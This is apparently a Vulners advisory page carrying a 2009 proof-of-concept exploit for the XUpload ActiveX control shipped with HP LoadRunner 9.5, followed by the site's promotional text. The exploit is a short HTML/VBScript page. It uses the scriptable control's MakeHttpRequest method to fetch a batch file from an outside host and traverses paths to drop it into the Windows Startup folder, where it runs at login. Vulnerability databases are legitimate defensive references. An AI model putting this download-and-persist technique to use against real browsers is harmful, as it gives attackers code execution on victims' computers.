Vulners
Lucene search
HP LoadRunner 9.5 - Remote file creation (PoC)
<!--
HP LoadRunner 9.5 Persits.XUpload.2 control (XUpload.ocx) MakeHttpRequest() remote file creation poc
(IE 8)
by Nine:Situations:Group::pyrokinesis
CLSID: {E87F6C8E-16C0-11D3-BEF7-009027438003}
Progid: Persits.XUpload.2
Binary Path: C:\Programmi\HP\LoadRunner\bin\XUpload.ocx
KillBitted: False
Implements IObjectSafety: True
Safe For Initialization (IObjectSafety): True
Safe For Scripting (IObjectSafety): True
-->
<html>
<object classid='clsid:E87F6C8E-16C0-11D3-BEF7-009027438003' id='XUPLOADLib' />
</object>
<script language='vbscript'>
' http://retrogod.altervista.org/sh_9232.txt , a batch script that starts calc.exe
XUPLOADLib.Server = "retrogod.altervista.org"
XUPLOADLib.Script = "sh_9232.txt"
' place it in the Startup folder, italian path, change for your os
Method=""
Params=""
Path="..\\..\\..\\Documents and Settings\All Users.WINDOWS\Menu Avvio\Programmi\Esecuzione automatica\\sh.cmd"
UserAgent=""
Headers=""
XUPLOADLib.MakeHttpRequest Method ,Params ,Path ,UserAgent ,Headers
</script>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Sep 2009 00:00Current
7.4High risk
Vulners AI Score7.4